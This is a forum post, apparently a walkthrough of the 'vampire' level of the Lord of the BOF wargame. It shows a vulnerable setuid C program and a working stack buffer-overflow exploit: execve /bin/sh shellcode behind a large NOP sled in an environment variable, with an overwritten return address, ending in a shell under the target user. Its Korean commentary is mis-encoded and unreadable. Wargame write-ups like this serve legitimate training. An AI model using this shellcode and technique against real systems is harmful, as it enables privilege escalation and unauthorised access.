|
http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=8611 [º¹»ç]
[troll@localhost troll]$ bash2
[troll@localhost troll]$ ls -al
total 44
drwx------ 2 troll troll 4096 Mar 29 2010 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw-r--r-- 1 troll troll 24 Mar 1 2010 .bash_logout
-rw-r--r-- 1 troll troll 230 Mar 1 2010 .bash_profile
-rw-r--r-- 1 troll troll 124 Mar 1 2010 .bashrc
-rwxr-xr-x 1 troll troll 333 Mar 1 2010 .emacs
-rw-r--r-- 1 troll troll 3394 Mar 1 2010 .screenrc
-rwsr-sr-x 1 vampire vampire 12103 Mar 2 2010 vampire
-rw-r--r-- 1 root root 550 Mar 29 2010 vampire.c
[troll@localhost troll]$ cat vampire.c
/*
The Lord of the BOF : The Fellowship of the BOF
- vampire
- check 0xbfff
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// here is changed!
if(argv[1][46] == '\xff')
{
printf("but it's not forever\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
argv[1][47]Àº "\xbf"ÀÌ¸é¼ argv[1][46]Àº "\xff"°¡ µÇ¸é ¾È µÈ´Ù.
¸Ó¸´¼Ó¿¡ ¹Ù·Î ¶°¿À¸¥ »ý°¢Àº...
ȯ°æº¯¼ö¿¡ shellcode¸¦ ¿Ã·Á³õ´Âµ¥ ¾Õ¿¡ nopÀ» 10¸¸°³Á¤µµ ¿Ã·Á³õÀ¸¸é
\xff°ªÀÌ ¹Ù²îÁö ¾ÊÀ»±î ½Í¾ú´Âµ¥...
[troll@localhost troll]$ export SHELLCODE=$(python -c 'print "\x90"*100000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')[troll@localhost troll]$ vi getenv.c
[troll@localhost troll]$ gcc -o getenv getenv.c
[troll@localhost troll]$ ./getenv
0xbffe7834
[troll@localhost troll]$ ./vampire `python -c 'print "\x90"*44+"\x34\x89\xfe\xbf"'`
4©¢¯
bash$ id
uid=508(troll) gid=508(troll) euid=509(vampire) egid=509(vampire) groups=508(troll)
bash$ my-pass
euid = 509
[???????????????]
bash$
...³Ê¹« ½±°Ô ½©À» µû¹ö·È´Ù;;
¹®Á¦ Ǫ´Âµ¥ 2~3ºÐ¹Û¿¡ ¾È °É¸²...
´ÙÀ½ ´Ü°è·Î ¤¡¤¡½Ì |
Hit : 1107 Date : 2025/07/08 07:37
|
1617, 
1/81 
